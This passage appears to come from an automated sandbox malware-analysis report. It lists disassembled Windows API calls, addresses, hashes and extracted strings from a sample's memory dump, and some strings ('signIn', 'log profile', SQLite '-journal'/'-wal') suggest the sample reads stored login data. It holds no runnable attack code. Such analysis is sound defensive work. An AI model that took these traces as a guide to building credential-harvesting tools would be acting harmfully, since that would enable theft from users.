                                                                                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                              • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                              • API String ID: 776488737-1622828088
                                                                                                                                                                                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                              • String ID: sysdatetimepick32
                                                                                                                                                                                                                              • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                              • String ID: -journal$-wal
                                                                                                                                                                                                                              • API String ID: 438689982-2894717839
                                                                                                                                                                                                                              • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3975816621-0
                                                                                                                                                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                              • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2313361498-0
                                                                                                                                                                                                                              • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2047574939-0
                                                                                                                                                                                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4218492932-0
                                                                                                                                                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                              • String ID: gj
                                                                                                                                                                                                                              • API String ID: 438689982-4203073231
                                                                                                                                                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                              • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4281309102-0
                                                                                                                                                                                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _snwprintfwcscat
                                                                                                                                                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                              • API String ID: 384018552-4153097237
                                                                                                                                                                                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                              • String ID: 0$6
                                                                                                                                                                                                                              • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                              • String ID: 6$\
                                                                                                                                                                                                                              • API String ID: 404372293-1284684873
                                                                                                                                                                                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1331804452-0
                                                                                                                                                                                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID: advapi32.dll
                                                                                                                                                                                                                              • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                              • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                              Memory Dump Source
